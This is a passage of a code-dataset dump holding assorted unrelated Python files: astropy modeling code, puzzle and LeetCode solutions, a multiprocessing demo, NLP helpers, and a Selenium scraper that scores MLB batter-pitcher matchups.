inmap, outmap):\n for tr in transforms:\n self[tr] = [inmap, outmap]\n\n def _verify_no_mapper_input(self, *data):\n ndim = self.keys()[0].n_inputs\n for tr in self.keys():\n if tr.n_inputs != ndim:\n raise ValueError(\"tr.n_inputs ...\")\n\n def invert(self, inmap, outmap):\n pcomptr = PCompositeModel(self.keys()[::-1], inmap=inmap, outmap=outmap)\n return pcomptr\n\n def __call__(self, x, *data):\n \"\"\"\n Transforms data using this model.\n \"\"\"\n lendata = len(data) + 1\n if lendata == 1:\n if not isinstance(x, LabeledInput):\n self._verify_no_mapper_input(x)\n result = x.copy()\n for tr in self:\n delta = tr(x) - x\n result = result + delta\n return result\n else:\n assert self.inmap is not None, (\"Parameter 'inmap' must be \"\n \"provided when input is a labeled object\")\n assert self.outmap is not None, (\"Parameter 'outmap' must be \"\n \"provided when input is a labeled object\")\n linp = x.copy()\n # create a list of inputs to be passed to the transforms\n inlist = [getattr(linp, co) for co in self.inmap]\n # create a list of outputs to which the deltas are applied\n result = [getattr(linp, co) for co in self.outmap]\n res = [tr(*inlist) for tr in self]\n delta = (np.asarray(res) - np.asarray(result)).sum(axis=0)\n result = np.asarray(result) + delta\n for outcoo, res in zip(self.outmap, result):\n linp[outcoo] = res\n setattr(linp, outcoo, res)\n # always return the entire labeled object, not just the result\n # since this may be part of another composite transform\n return linp\n else:\n self._verify_no_mapper_input(x, *data)\n inlist = [x]\n inlist.extend(list(data))\n result = inlist[:]\n for tr in self.keys():\n res = tr(*inlist)\n for i in range(len(inlist)):\n result[i] = res[i] - inlist[i]\n return result\n","repo_name":"RayPlante/astropy","sub_path":"astropy/modeling/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":28553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"33918725188","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nfrom common import *\n\n\noo = int(ls[0].split(' ')[-1])\not = int(ls[1].split(' ')[-1])\n\n\n# part 1\no, t = oo, ot\nos = ts = 0\nd = count(1)\nn = True\nwhile os < 1000 and ts < 1000:\n if n:\n o = (o + next(d) + next(d) + next(d) - 1) % 10 + 1\n os += o\n else:\n t = (t + next(d) + next(d) + next(d) - 1) % 10 + 1\n ts += t\n n = not n\nsm(min(os, ts) * 
(next(d) - 1))\n\n\n# part 2\ndef rec(o, t, os, ts, n):\n if os >= 21:\n return 1, 0\n if ts >= 21:\n return 0, 1\n ow = tw = 0\n for r, p in [(3, 1), (4, 3), (5, 6), (6, 7), (7, 6), (8, 3), (9, 1)]:\n if n:\n no = (o + r - 1) % 10 + 1\n co, ct = rec(no, t, os + no, ts, False)\n else:\n nt = (t + r - 1) % 10 + 1\n co, ct = rec(o, nt, os, ts + nt, True)\n ow += p * co\n tw += p * ct\n return ow, tw\n\n\nsm(max(rec(oo, ot, 0, 0, True)))\n","repo_name":"zswaff/advent","sub_path":"2021/21/sln.py","file_name":"sln.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"33959898264","text":"\"\"\"\n多进程间的通信 >>>Queue队列 队列特点:先进先出 CBA >>>CBA\n栈 >>> 先进后出\n\"\"\"\n# 队列 >>> 先进先出\n# import multiprocessing\n# q = multiprocessing.Queue(3) # 创建 Q队列 对象,参数表示:容器大小,无参数可以无限放。\n# # 如何放数据\n# q.put() # 调用Q队列对象的 put方法\n# q.full() # 查看队列是否满了,True 为满\n# q.get() # 取出数据\n# q.empty() # 判断队列为空,True 为空\n# q.get_nowait() #不等待\n\n# import multiprocessing\n# # 创建空的容器为3的Q队列\n# q = multiprocessing.Queue(3)\n# # 存放3个数据\n# q.put(123)\n# q.put(\"bobo\")\n# q.put([4, 5, 6])\n# # 取数据 >>> 先进先出\n# i = 1\n# while not q.empty():\n# print(\"取出第%d个数据是:%s \"%(i,q.get()))\n# i += 1\n\n\"\"\"Queue队列应用演示\"\"\"\n\nimport multiprocessing\n\n\ndef demo1(q):\n # 把获取数据,传入Q队列\n data = [c for c in range(1, 10)]\n for i in data:\n q.put(i)\n\n\ndef demo2(q):\n # 清洗接收队列中的数据,提取数据中的偶数\n even = []\n while not q.empty():\n d = q.get()\n if d % 2 == 0:\n q.put(d)\n # even.append(d)\n # print(even)\n\n\ndef demo3(q):\n result = []\n while not q.empty():\n result.append(q.get())\n print(result)\n\n\ndef main():\n q = multiprocessing.Queue()\n p1 = multiprocessing.Process(target=demo1, args=(q,))\n p2 = multiprocessing.Process(target=demo2, args=(q,))\n p3 = multiprocessing.Process(target=demo3, args=(q,))\n p1.start()\n p1.join()\n p2.start()\n p2.join()\n p3.start()\n p3.join()\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"ww35133634/chenxusheng","sub_path":"ITcoach/python_ knowledge_point_practice/多进程queue队列解决不能访问全局变量.py","file_name":"多进程queue队列解决不能访问全局变量.py","file_ext":"py","file_size_in_byte":1707,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29285471811","text":"from nltk.tokenize import sent_tokenize\nfrom parrot import Parrot\nimport streamlit as st\nfrom fuzzywuzzy import fuzz\nimport re\nfrom typing import List\nimport logging\n\nlogging.basicConfig(level=logging.NOTSET)\n\n\ndef read_txt_file(filename: str) -> str:\n with open(filename) as f:\n token = f.readlines()[0]\n return token\n\n\ndef check_text_similarity(first_text: str, second_text: str) -> float:\n \"\"\"\n Checks similarity between 2 given texts based on the fuzz partial ratio\n \"\"\"\n return (\n fuzz.partial_ratio(\n first_text,\n second_text,\n )\n / 100\n )\n\n\ndef get_most_diverse_text(original_text: str, text_variations_list: List) -> str:\n \"\"\"\n Get an original text and compare it with text variations coming as a list.\n kept_sentence: Str text coming as the least similar to the original text\n\n \"\"\"\n similarity_list = []\n\n for temp_dif_sentence in text_variations_list:\n temp_text_similarity = check_text_similarity(\n original_text, temp_dif_sentence[0].capitalize()\n )\n similarity_list.append(temp_text_similarity)\n\n min_index = similarity_list.index(min(similarity_list))\n kept_sentence = 
text_variations_list[min_index][0].capitalize()\n kept_sentence = kept_sentence + \". \"\n\n return kept_sentence\n\n\ndef create_paraphrase(\n parrot_model: Parrot,\n text: str,\n adequacy_threshold: float = 0.75,\n fluency_threshold: float = 0.90,\n diversity_ranker: str = \"levenshtein\",\n) -> str:\n \"\"\"\n Creates the new paraphrased text\n \"\"\"\n logging.info(\"Spliting to sentences.........\")\n sentences = re.split(\"[,.!?;]\", text)\n new_text = \"\"\n logging.info(\"Creating paraphrased text for each sentence.........\")\n for sentence in sentences:\n dif_sentences = parrot_model.augment(\n input_phrase=sentence,\n diversity_ranker=diversity_ranker,\n adequacy_threshold=adequacy_threshold,\n fluency_threshold=fluency_threshold,\n )\n\n if dif_sentences != None:\n kept_sentence = get_most_diverse_text(sentence, dif_sentences)\n new_text = new_text + kept_sentence\n\n return new_text\n\n\n@st.experimental_singleton\ndef get_model() -> Parrot:\n\n return Parrot(\n model_tag=\"prithivida/parrot_paraphraser_on_T5\",\n use_gpu=False,\n )\n","repo_name":"stavrostheocharis/quotera","sub_path":"src/analytics/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"54"} +{"seq_id":"72822099682","text":"import graphviz\n\ndef draw_graph(node_index, edge_index, y, prediction, colors, path, label):\n subg = graphviz.Digraph(path, comment='Neighborhood-Subgraph')\n subg.attr(label=label)\n for node in node_index:\n subg.node(str(node), fontcolor=colors[prediction[node]], color=colors[y[node]])\n strings0 = []\n for ele in edge_index[0]:\n strings0.append(str(ele))\n strings1 = []\n for ele in edge_index[1]:\n strings1.append(str(ele))\n\n edge_list = [strings0, strings1]\n edge_list_trans = tuple(zip(*edge_list))\n \"\"\"\n edge_score = edge_score.tolist()\n print(len(edge_score))\n print(len(edge_list_trans))\n for ele in range(len(edge_list_trans)):\n print(round(edge_score[ele], 1))\n subg.edge(edge_list_trans[ele][0], edge_list_trans[ele][1],\n color=\"0.000 0.000 0.000 \" + str(edge_score[ele]))\n \"\"\"\n subg.edges(edge_list_trans)\n subg.render(directory=r\"C:\\Users\\Patrick\\OneDrive - student.kit.edu\\07 WS 22-23 BT\\CF-GNN Experiments\")\n\n\ndef draw_graph_without_imp_nodes(node_index, edge_index, y, prediction, prediction_index, colors, path):\n subg = graphviz.Digraph(path, comment='Neighborhood-Subgraph')\n\n for index in range(len(node_index)):\n subg.node(str(node_index[index]), fontcolor=colors[prediction[prediction_index[index]]],\n color=colors[y[node_index[index]]])\n strings0 = []\n for ele in edge_index[0]:\n strings0.append(str(ele))\n strings1 = []\n for ele in edge_index[1]:\n strings1.append(str(ele))\n\n edge_list = [strings0, strings1]\n edge_list_trans = tuple(zip(*edge_list))\n subg.edges(edge_list_trans)\n subg.render(directory=r\"C:\\Users\\Patrick\\OneDrive - student.kit.edu\\07 WS 22-23 BT\\Experiments\")\n\n","repo_name":"patrillicit/cf-gnnexplainer","sub_path":"visualization/subgraph_plotting.py","file_name":"subgraph_plotting.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"24837981896","text":"def tokenize(code):\n tokens = []\n lines = code.split('\\n')\n for row, line in enumerate(lines):\n tokens.extend(line.split())\n return tokens\n\ndef hash_tokens(tokens):\n hash_table = {}\n row = 0\n col = 0\n for token in tokens:\n 
key = f'{row},{col}'\n hash_table[key] = token\n col += 1\n if col >= len(tokens):\n col = 0\n row += 1\n return hash_table\n\n\ndef search_variable(hash_table, query):\n results = []\n for key, value in hash_table.items():\n if query == key or query == value:\n results.append(value)\n return results\n\n\ndef add_variable(hash_table):\n variable_name = input(\"Ingrese el nombre de la variable: \")\n key = input(\"Ingrese la clave de la variable (en formato 'fila,columna'): \")\n hash_table[key] = variable_name\n print(\"Variable agregada con éxito.\")\n\ndef main():\n code = input(\"Ingrese el código fuente: \")\n\n tokens = tokenize(code)\n hash_table = hash_tokens(tokens)\n\n print(\"Tabla hash:\")\n for key, value in hash_table.items():\n print(f'{key}: {value}')\n\n while True:\n print(\"\\n--- MENÚ ---\")\n print(\"1. Buscar una variable\")\n print(\"2. Agregar una variable\")\n print(\"3. Salir\")\n option = input(\"Ingrese una opción: \")\n\n if option == \"1\":\n query = input(\"Ingrese el nombre de la variable o la clave (en formato 'fila,columna'): \")\n results = search_variable(hash_table, query)\n if results:\n print(f\"La clave '{query}' corresponde a la variable:\")\n for result in results:\n print(result)\n else:\n print(f\"No se encontró ninguna coincidencia para '{query}'.\")\n\n elif option == \"2\":\n add_variable(hash_table)\n\n elif option == \"3\":\n break\n\n else:\n print(\"Opción inválida. Intente nuevamente.\")\n\nif __name__ == '__main__':\n main()\n","repo_name":"Arsito15/Tabla_Hash","sub_path":"tabla_hash.py","file_name":"tabla_hash.py","file_ext":"py","file_size_in_byte":1991,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17246546411","text":"def get_final_acc_from_instructions():\n with open('input.txt') as fin:\n input_list = fin.readlines()\n text_lst = [i.replace(\"\\n\", \"\") for i in input_list]\n text_lst = [i.split(\" \") for i in text_lst]\n\n # Initalising variables\n current_acc = 0\n instr_index_lst = []\n current_instr=0\n\n # Run until new instruction is repeated\n while current_instr not in instr_index_lst:\n instr_index_lst.append(current_instr)\n command = text_lst[current_instr][0]\n value = text_lst[current_instr][1]\n \n # Running commands\n if command == \"acc\":\n current_acc += int(value)\n current_instr += 1\n elif command == \"jmp\":\n current_instr += int(value)\n elif command == \"nop\":\n current_instr += 1\n\n return current_acc\n\nfinal_acc = get_final_acc_from_instructions()\nprint(final_acc)\n","repo_name":"cre8tion/AoC2020","sub_path":"day8/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"27996924218","text":"#\n# @lc app=leetcode id=329 lang=python3\n#\n# [329] Longest Increasing Path in a Matrix\n#\n# https://leetcode.com/problems/longest-increasing-path-in-a-matrix/description/\n#\n# algorithms\n# Hard (52.42%)\n# Likes: 7836\n# Dislikes: 116\n# Total Accepted: 437.9K\n# Total Submissions: 835.1K\n# Testcase Example: '[[9,9,4],[6,6,8],[2,1,1]]'\n#\n# Given an m x n integers matrix, return the length of the longest increasing\n# path in matrix.\n# \n# From each cell, you can either move in four directions: left, right, up, or\n# down. 
You may not move diagonally or move outside the boundary (i.e.,\n# wrap-around is not allowed).\n# \n# \n# Example 1:\n# \n# \n# Input: matrix = [[9,9,4],[6,6,8],[2,1,1]]\n# Output: 4\n# Explanation: The longest increasing path is [1, 2, 6, 9].\n# \n# \n# Example 2:\n# \n# \n# Input: matrix = [[3,4,5],[3,2,6],[2,2,1]]\n# Output: 4\n# Explanation: The longest increasing path is [3, 4, 5, 6]. Moving diagonally\n# is not allowed.\n# \n# \n# Example 3:\n# \n# \n# Input: matrix = [[1]]\n# Output: 1\n# \n# \n# \n# Constraints:\n# \n# \n# m == matrix.length\n# n == matrix[i].length\n# 1 <= m, n <= 200\n# 0 <= matrix[i][j] <= 2^31 - 1\n# \n# \n#\n\n# @lc code=start\nclass Solution:\n def longestIncreasingPath(self, matrix: List[List[int]]) -> int:\n ROWS = len(matrix)\n COLS = len(matrix[0])\n\n dp = {} # (r,c) : longest incresing path length \n\n def dfs(r,c,prevNum):\n if r < 0 or r == ROWS or c < 0 or c == COLS or matrix[r][c] <= prevNum:\n return 0\n\n # return if in cache\n if (r,c) in dp:\n return dp[(r,c)]\n\n res = 1\n res = max(res, dfs(r-1,c,matrix[r][c]) + 1)\n res = max(res, dfs(r+1,c,matrix[r][c]) + 1)\n res = max(res, dfs(r,c-1,matrix[r][c]) + 1)\n res = max(res, dfs(r,c+1,matrix[r][c]) + 1)\n\n dp[(r,c)] = res\n\n return res\n \n\n for r in range(ROWS):\n for c in range(COLS):\n dfs(r,c,-1)\n\n lip = max(dp.values())\n\n return lip\n\n \n# @lc code=end\n\n","repo_name":"wintai9899/Leetcode-Python","sub_path":"DP/329.longest-increasing-path-in-a-matrix.py","file_name":"329.longest-increasing-path-in-a-matrix.py","file_ext":"py","file_size_in_byte":2069,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70939900003","text":"import spacy\nfrom nominatim import *\n\ndef NER(dataframe,abbHistoryDict):\n df = dataframe.copy()\n\n nlp_xx = spacy.load('xx_ent_wiki_sm')\n ner_xx = nlp_xx.get_pipe(\"ner\")\n useful_NER_labels = ['LOC']\n changed_values_count = 0\n for i,row in df.iterrows() :\n if row.location == '':\n continue\n if row.location in abbHistoryDict:\n continue\n\n doc_xx = nlp_xx(row.location)\n processed_xx = ner_xx(doc_xx)\n\n for ent in processed_xx.ents:\n if (ent.label_ in useful_NER_labels):\n formatted_location = nominatimQueryToCountryCode(str(ent))\n if formatted_location :\n\n abbHistoryDict[formatted_location] = formatted_location\n abbHistoryDict[str(ent)] = formatted_location\n\n df.iloc[i].location = formatted_location\n changed_values_count += 1\n break\n\n changed_values_percent = changed_values_count/len(df)\n return df , changed_values_percent, abbHistoryDict\n","repo_name":"annbeg/diplom","sub_path":"NER.py","file_name":"NER.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"29343048567","text":"from textSummarizer.logging import logger\nfrom textSummarizer.pipeline.data_ingestion import \\\n DataIngestionTrainingPipeline\nfrom textSummarizer.pipeline.data_transformation import \\\n DataTransformationTrainingPipeline\nfrom textSummarizer.pipeline.data_validation import \\\n DataValidationTrainingPipeline\nfrom textSummarizer.pipeline.model_trainer import ModelTrainerTrainingPipeline\nfrom textSummarizer.pipeline.model_evaluation import ModelEvaluationTrainingPipeline\n\n\nSTAGE_NAME = 'Data Ingestion stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. 
<<<<<<')\n data_ingestion_pipeline = DataIngestionTrainingPipeline()\n data_ingestion_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\n\nSTAGE_NAME = 'Data Validation stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n data_validation_pipeline = DataValidationTrainingPipeline()\n data_validation_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\nSTAGE_NAME = 'Data Transformation stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n data_transformation_pipeline = DataTransformationTrainingPipeline()\n data_transformation_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\nSTAGE_NAME = 'Model Trainer stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n model_trainer_pipeline = ModelTrainerTrainingPipeline()\n model_trainer_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e\n\nSTAGE_NAME = 'Model Evaluation stage'\ntry:\n logger.info(f'>>>>>> Starting {STAGE_NAME}. <<<<<<')\n model_evaluation_pipeline = ModelEvaluationTrainingPipeline()\n model_evaluation_pipeline.main()\n logger.info(f'>>>>>> Stage {STAGE_NAME} completed. <<<<<<')\nexcept Exception as e:\n logger.exception(e)\n raise e","repo_name":"MuriloKrebsky/text_summarization","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38807507041","text":"import re\ndef welcome_msg():\n print(\"welcome to the game, guess the answer\")\nwelcome_msg()\n# to open and read file come from \"dark_and_stormy_night_template\" file\ndef read_template(pathOfFile):\n try :\n with open(pathOfFile)as file:\n return file.read()\n except FileNotFoundError:\n raise FileNotFoundError(\"file not found\")\n # except AssertionError :\n # return(\"asseert\")\n \n\n# two arg\ndef parse_template(content):\n parse= re.findall(r'\\{(.*?)\\}', content)\n # while x\n for x in parse: \n # Adjective\n content=content.replace((x),'',2)\n\n\n \n return content, tuple(parse)\n\n\ndef merge(content,parse):\n updated=content.format(*parse)\n\n with open('assets/test7_merge.txt','w') as result:\n result.write(updated)\n return updated","repo_name":"jariryyousef/madlib_cli","sub_path":"madlib_cli/madlib_cli.py","file_name":"madlib_cli.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40287036561","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.edge.options import Options as EdgeOptions\nfrom datetime import date\nimport csv\nimport numpy as np\n\nfrom gen_pitcher_stats import ballParkPal as getPitcherStats\nfrom gen_batter_stats import ballParkPal as getAllBattersOfTeam\n# import gen_team_stats\n\ndef getGames():\n url = 'https://www.rotowire.com/baseball/daily-lineups.php'\n tomorrowUrl ='https://www.rotowire.com/baseball/daily-lineups.php?date=tomorrow'\n options = EdgeOptions()\n options.add_argument('--start-maximized')\n options.add_experimental_option('excludeSwitches', ['enable-logging'])\n driver = webdriver.Edge(options=options)\n\n driver.get(url)\n \n # return values\n 
awayTeamAbbr, homeTeamAbbr, awayTeams, homeTeams, awayPitchers, homePitchers = ([] for i in range(6))\n\n path = '/html/body/div[1]/div/main/div[3]'\n lineups = driver.find_element(By.CLASS_NAME, 'lineups').find_elements(By.CLASS_NAME, 'lineup')\n for index, lineup in enumerate(lineups[:-2]):\n if index == 4:\n continue\n try:\n awayPitchers.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[2]/ul[1]/li[1]/div[1]/a').text.split()[1])\n homePitchers.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[2]/ul[2]/li[1]/div[1]/a').text.split()[1])\n except:\n continue\n abbrA = lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[1]/div/div[1]/div').text\n abbrH = lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/div[1]/div/div[2]/div').text\n if abbrA == 'CWS':\n abbrA = 'CHW'\n if abbrH == 'CWS':\n abbrH = 'CHW'\n awayTeamAbbr.append(abbrA)\n homeTeamAbbr.append(abbrH)\n nameArray = lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/a/div[1]').text.split()\n if len(nameArray) > 2:\n awayTeams.append(' '.join(nameArray[0:2]))\n else:\n awayTeams.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/a/div[1]').text.split()[0])\n homeTeams.append(lineup.find_element(By.XPATH, f'{path}/div[{index+1}]/div[2]/a/div[2]').text.split()[0])\n\n driver.quit()\n\n return awayTeamAbbr, homeTeamAbbr, awayTeams, homeTeams, awayPitchers, homePitchers\n\ndef main():\n awayTeamAbbr, homeTeamAbbr, awayTeams, homeTeams, awayPitchers, homePitchers = getGames()\n\n # for awayTeam in awayTeams:\n # gen_team_stats.main(awayTeam)\n\n # for homeTeam in homeTeams:\n # gen_team_stats.main(homeTeam)\n\n batterMap = []\n batListA, batListH, parkFactorA, parkFactorH, pitchListA, pitchListH = ([] for i in range(6))\n\n for name in awayTeamAbbr:\n awayBatterStats, awayParkFactor = getAllBattersOfTeam(name)\n if name == 'KC':\n awayBatterStats = awayBatterStats[1:]\n batListA.append(awayBatterStats)\n parkFactorA.append(awayParkFactor)\n\n for name in homeTeamAbbr:\n homeBatterStats, homeParkFactor = getAllBattersOfTeam(name)\n if name == 'KC':\n homeBatterStats = homeBatterStats[1:]\n batListH.append(homeBatterStats)\n parkFactorH.append(homeParkFactor)\n\n for index, awayPitcher in enumerate(awayPitchers):\n awayPT, awayPP, awayPO, awayLines, awayHand = getPitcherStats(awayPitcher, awayTeamAbbr[index])\n pitchListA.append([awayPT, awayPP, awayPO, awayLines, awayHand])\n\n for index, homePitcher in enumerate(homePitchers):\n homePT, homePP, homePO, homeLines, homeHand = getPitcherStats(homePitcher, homeTeamAbbr[index])\n pitchListH.append([homePT, homePP, homePO, homeLines, homeHand])\n\n opsFactor = None\n numGames = len(pitchListH)\n\n for i in range(numGames):\n if len(pitchListH[i][0]) < 2:\n continue\n parkFactor = parkFactorA[i]\n for player in batListA[i]:\n score = 0\n pp = 0\n for j in range(3, 11):\n if not pitchListH[i][0][j]:\n continue\n weight = (float(player[j]) - float(pitchListH[i][0][j])) * float(pitchListH[i][1][j])\n pp += weight\n score += pp\n cmp = (float(player[11]) + float(pitchListH[i][2][0]))/2 - 0.051\n xbh = (cmp*100/0.051) * (100/125) * 10\n score += xbh\n cmp = (float(player[12]) + float(pitchListH[i][2][1]))/2 - 0.103\n bb = -(cmp*100/0.103) * (100/125) * 10\n score += bb\n cmp = (float(player[13]) + float(pitchListH[i][2][2]))/2 - 0.227\n so = -(cmp*100/0.227) * (100/125) * 10\n score += so\n cmp = (float(player[14]) + float(pitchListH[i][3][0]))/2 - 0.23\n line = (cmp*100/0.23) * (100/125) * 10\n score += 
line\n diff = 0\n if (player[2] == \"L\"):\n if (pitchListH[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListH[i][4][0]))\n else:\n diff = (float(player[16]) - float(pitchListH[i][4][0]))\n elif (player[2] == \"R\"):\n if (pitchListH[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListH[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListH[i][4][1]))\n else:\n if (pitchListH[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListH[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListH[i][4][0]))\n score += diff\n if len(player) > 17:\n opsFactor = float(player[17]) - .736 + 1\n score *= opsFactor\n score *= parkFactor\n score /= 100\n\n batterMap.append(player[0:2] + [pitchListH[i][0][0]] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [parkFactor] + [round(score, 1)])\n # batterMap.append(player[0:2] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [round(score, 1)])\n\n for i in range(numGames):\n if len(pitchListA[i][0]) < 2:\n continue\n parkFactor = parkFactorH[i]\n for player in batListH[i]:\n score = 0\n pp = 0\n for j in range(3, 11):\n if not pitchListA[i][0][j]:\n continue \n weight = (float(player[j]) - float(pitchListA[i][0][j])) * float(pitchListA[i][1][j])\n pp += weight\n score += pp\n cmp = (float(player[11]) + float(pitchListA[i][2][0]))/2 - 0.051\n xbh = (cmp*100/0.051) * (100/125) * 10\n score += xbh\n cmp = (float(player[12]) + float(pitchListA[i][2][1]))/2 - 0.103\n bb = -(cmp*100/0.103) * (100/125) * 10\n score += bb\n cmp = (float(player[13]) + float(pitchListA[i][2][2]))/2 - 0.227\n so = -(cmp*100/0.227) * (100/125) * 10\n score += so\n cmp = (float(player[14]) + float(pitchListA[i][3][0]))/2 - 0.23\n line = (cmp*100/0.23) * (100/125) * 10\n score += line\n diff = 0\n if (player[2] == \"L\"):\n if (pitchListA[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListA[i][4][0]))\n else:\n diff = (float(player[16]) - float(pitchListA[i][4][0]))\n elif (player[2] == \"R\"):\n if (pitchListA[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListA[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListA[i][4][1]))\n else:\n if (pitchListA[i][0][2] == \"L\"):\n diff = (float(player[15]) - float(pitchListA[i][4][1]))\n else:\n diff = (float(player[16]) - float(pitchListA[i][4][0]))\n score += diff\n if len(player) > 17:\n opsFactor = float(player[17]) - .736 + 1\n score *= opsFactor\n score *= parkFactor\n score /= 100\n\n batterMap.append(player[0:2] + [pitchListA[i][0][0]] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [parkFactor] + [round(score, 1)])\n # batterMap.append(player[0:2] + [pp] + [xbh] + [bb] + [so] + [line] + [diff] + [opsFactor] + [round(score, 1)])\n\n arr = np.array(batterMap)\n sorterBatters = arr[arr[:, 11].argsort()[::-1]]\n\n with open(f'{date.today()}.csv','w', newline='') as f:\n w = csv.writer(f)\n w.writerow([\"Team\", \"Player\", \"Opp\", \"PP\", \"XBH\", \"BB\", \"K\", \"Line\", \"H\", \"OPS Factor\", \"Park Factor\", \"Score\"])\n # w.writerow([\"Team\", \"Player\", \"PP\", \"XBH\", \"BB\", \"K\", \"Line\", \"H\", \"OPS Factor\", \"Score\"])\n w.writerows(sorterBatters)\n\nif __name__ == '__main__':\n main()","repo_name":"ccstevie/mlb-model","sub_path":"gen_matchup_stats.py","file_name":"gen_matchup_stats.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} 
+{"seq_id":"22858367855","text":"list1=[2,3,4,5,56,56,56]\r\nsearch=int(input(\"enter input to search in list\"))\r\ni=1\r\nwhile i<=1:\r\n if search in list1:\r\n p=list1.index(search)\r\n print(\"position of\",search ,\"is\",p)\r\n i=i+1\r\n else:\r\n print(\"your search is not present in list\")\r\n i=i+1\r\n","repo_name":"arman84510/python-loop","sub_path":"search position.py","file_name":"search position.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3276337942","text":"import sys\nsys.stdin = open('input.txt')\n\nT = int(input())\nfor tc in range(1, T+1):\n A, B = map(str, input().split())\n i = 0\n cnt = 0\n while i < len(A):\n if A[i:i+len(B)] == B:\n cnt += 1\n i += len(B)\n else:\n i += 1\n text_length = len(A) - cnt * len(B) + cnt\n print('#{} {}'.format(tc, text_length))","repo_name":"kellyjung5512/TIL","sub_path":"01_algorithm_study/0817/가장 빠른 문자열 타이핑/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"40134957349","text":"__author__ = 'Geoge'\n\nimport sys\n\nimport nltk\nfrom nltk import grammar, parse\nfrom nltk.grammar import FeatureGrammar, FeatStructNonterminal, FeatStructReader, read_grammar, SLASH, TYPE, Production\n\nfrom collections import defaultdict\nfrom floraparser import lexicon\nfrom floraparser.fltoken import FlSentence, FlToken\nfrom floracorpus.reader import AbstractFloraCorpusReader, FloraCorpusReader\n\n\nclass FGFlora(FeatureGrammar):\n @classmethod\n def fromstring(cls, input, features=None, logic_parser=None, fstruct_reader=None,\n encoding=None, fltokens:[FlToken]=None):\n \"\"\"\n Return a feature structure based ``FeatureGrammar``.\n\n :param input: a grammar, either in the form of a string or else\n as a list of strings.\n :param features: a tuple of features (default: SLASH, TYPE)\n :param logic_parser: a parser for lambda-expressions,\n by default, ``LogicParser()``\n :param fstruct_reader: a feature structure parser\n (only if features and logic_parser is None)\n \"\"\"\n if features is None:\n features = (TYPE, SLASH)\n\n if fstruct_reader is None:\n fstruct_reader = FeatStructReader(features, FeatStructNonterminal,\n logic_parser=logic_parser)\n elif logic_parser is not None:\n raise Exception('\\'logic_parser\\' and \\'fstruct_reader\\' must '\n 'not both be set')\n\n start, productions = read_grammar(input, fstruct_reader.read_partial,\n encoding=encoding)\n # if fltokens:\n # for fltoken in fltokens:\n # for lexent in fltoken.lexentry:\n 